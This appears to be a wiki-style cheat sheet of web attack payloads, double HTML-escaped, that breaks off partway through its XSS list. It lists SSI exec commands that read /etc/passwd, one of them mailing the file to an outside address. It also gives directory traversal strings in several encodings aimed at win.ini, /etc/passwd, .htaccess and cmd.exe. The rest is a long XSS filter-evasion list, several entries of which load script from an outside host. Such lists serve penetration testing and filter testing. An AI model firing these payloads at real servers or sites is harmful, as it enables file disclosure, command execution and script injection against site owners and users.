&lt;br /&gt;
=== SSI (Server Side Includes) Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Full List ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, 'XSS'&amp;quot;)`&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav	ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
\&amp;quot;;alert('XSS');//&lt;br /&gt;
&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&lt;br /&gt;
&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;XSS&amp;quot;)'&amp;gt;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IFRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;
&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&lt;br /&gt;
&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;*//*&amp;quot;);xss:&amp;amp;#101;x&amp;amp;#x2F;*XSS*//*/*/pression(alert(&amp;quot;XSS&amp;quot;))'&amp;gt;&lt;br /&gt;
&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert('XSS')&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;lt;BASE HREF=&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot; type=&amp;quot;image/svg+xml&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;xss&amp;quot; implementation=&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;#xss&amp;quot; DATAFLD=&amp;quot;B&amp;quot; DATAFORMATAS=&amp;quot;HTML&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML SRC=&amp;quot;xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;t&amp;quot; ns=&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;t&amp;quot; implementation=&amp;quot;#default#time2&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;innerHTML&amp;quot; to=&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;--&amp;gt;&lt;br /&gt;
&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT =&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; '' SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT &amp;quot;a='&amp;gt;'&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
